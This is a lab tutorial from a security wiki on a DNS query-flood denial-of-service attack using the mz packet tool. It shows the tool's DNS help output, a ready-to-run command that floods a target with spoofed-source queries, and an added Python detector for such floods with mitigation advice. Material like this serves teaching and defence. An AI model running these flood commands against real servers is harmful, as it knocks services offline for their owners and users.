DNS Flood DDoS Attack Using Fake Domain Names

From the BGA Security Wiki

Purpose:

Using the mz tool to keep a DNS server busy with queries for fake domain names so that the service is rendered unavailable.

Tool:

  • Mz

Lab Scenario:

In this article the mz tool is used to generate DNS packets. Detailed information on the parameters of the DNS packets that mz can generate is obtained as follows.

root@bt:~# mz -t dns help

Mausezahn 0.34.9 - (C) 2007-2009 by Herbert Haas - http://www.perihel.at/sec/mz/
| DNS type: Send Domain Name System Messages.
|
| Generally there are two interesting general DNS messages: queries and answers. The easiest
| way is to use the following syntax:
|
|   query|q = <name>[:<type>]  ............. where type is per default "A"
|                                            (and class is always "IN")
|
|   answer|a = [<type>:<ttl>:]<rdata> ...... ttl is per default 0.
|            = [<type>:<ttl>:]<rdata>/[<type>:<ttl>:]<rdata>/...
|
| Note: If you only use the 'query' option then a query is sent. If you additonally add
|       an 'answer' then an answer is sent.
|
| Examples:
|
|   q = www.xyz.com
|   q = www.xyz.com, a=192.168.1.10
|   q = www.xyz.com, a=A:3600:192.168.1.10
|   q = www.xyz.com, a=CNAME:3600:abc.com/A:3600:192.168.1.10
|
| Note: <type> can be: A, CNAME, or any integer
|
|
| OPTIONAL parameter hacks: (if you don't know what you do this might cause invalid packets)
|
|   Parameter                    Description                                  query / reply)
|   -------------------------------------------------------------------------------------
|
|   request/response|reply ..... flag only                                  request / n.a.
|   id ......................... packet id (0-65535)                         random / random
|   opcode (or op) ............. accepts values 0..15 or one of                 std / 0
|                                these keywords:
|                                = std ................... Standard Query
|                                = inv ................... Inverse Query
|                                = sts ................... Server Status Request
|   aa or !aa .................. Authoritative Answer                         UNSET / SET
|   tc or !tc .................. Truncation                                   UNSET / UNSET
|   rd or !rd .................. Recursion Desired                              SET / SET
|   ra or !ra .................. Recursion Available                         UNSET / SET
|   z .......................... Reserved (takes values 0..7)                     0 / 0
|                                (z=2...authenticated)
|   rcode ...................... Response Code (0..15); interesting               0 / 0
|                                values are:
|                                = 0 ...................... No Error Condition
|                                = 1 ...................... Unable to interprete query due to format error
|                                = 2 ...................... Unable to process due to server failure
|                                = 3 ...................... Name in query does not exist
|                                = 4 ...................... Type of query not supported
|                                = 5 ...................... Query refused
|
| Count values (values 0..65535) will be set automatically! You should not set these
| values manually except you are interested in invalid packets.
|   qdcount (or qdc) ........... Number of entries in question section            1 / 1
|   ancount (or anc) ........... Number of RRs in answer records section          0 / 1
|   nscount (or nsc) ........... Number of name server RRs in authority           0 / 0
|                                records section
|   arcount (or arc) ........... Number of RRs in additional records section      0 / 0

The run below shows mz sending DNS requests to the target DNS service with a spoofed source IP address, so that the service is kept busy and rendered unavailable. Here -A is the (spoofed) source address, -B the target address, -t dns "q=..." the queried name, and -c the number of frames to send.

root@bt:~# mz -A 5.5.5.5 -B 1.2.39.40 -t dns "q=www.bga.com.tr" -c 1000
Mausezahn will send 1000 frames... 0.05 seconds (20000 packets per second)
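From the defender's side, a flood like the one above is visible in the resolver's query log as a burst of queries for one name, either from a single spoofed address (as in this run) or spread over many of them. The following is an added example, not code from the BGA wiki or from mz: it parses a constructed query log in an assumed "<epoch_second> <client_ip> <qname>" format and flags seconds whose query rate exceeds a threshold, reporting whether the burst is concentrated on one source or spread across many.

```python
# Added example (not the wiki page's own code): spot a DNS query flood of the
# kind the mz command above produces in a resolver's query log.
# Assumed log line format (constructed for this example):
#   "<epoch_second> <client_ip> <qname>"
from collections import Counter, defaultdict

def build_sample_log():
    """Constructed log: 1000 queries for www.bga.com.tr in one second from a
    single spoofed source (as in the mz command), a second burst spread over
    800 spoofed sources, then a few lines of ordinary traffic."""
    lines = ["1700000000 5.5.5.5 www.bga.com.tr" for _ in range(1000)]
    lines += [f"1700000005 5.5.{i // 250}.{i % 250 + 1} www.bga.com.tr"
              for i in range(800)]
    lines += ["1700000006 10.0.0.5 www.bga.com.tr",
              "1700000006 10.0.0.6 mail.bga.com.tr",
              "garbage line"]  # malformed line, must be skipped
    return "\n".join(lines)

def parse_log(text):
    """Yield (second, client_ip, qname), ignoring malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        try:
            yield int(parts[0]), parts[1], parts[2].lower()
        except ValueError:
            continue

def detect_flood(text, qps_threshold=500):
    """Return one dict per second whose query count exceeds qps_threshold.
    'pattern' is single-source when one client sends most of the burst and
    spread-source when the burst comes from many (likely spoofed) clients."""
    seconds = defaultdict(lambda: {"n": 0, "src": Counter(), "qname": Counter()})
    for sec, src, qname in parse_log(text):
        b = seconds[sec]
        b["n"] += 1
        b["src"][src] += 1
        b["qname"][qname] += 1
    alerts = []
    for sec in sorted(seconds):
        b = seconds[sec]
        if b["n"] < qps_threshold:
            continue
        top_src_n = b["src"].most_common(1)[0][1]
        alerts.append({
            "second": sec, "qps": b["n"], "sources": len(b["src"]),
            "qname": b["qname"].most_common(1)[0][0],
            "pattern": "single-source" if top_src_n / b["n"] > 0.5 else "spread-source",
        })
    return alerts
```

A single-source alert is a candidate for rate limiting at the edge, while a spread-source alert with unroutable or unexpected client ranges points at spoofing and is better handled with response rate limiting on the server and BCP 38 ingress filtering upstream.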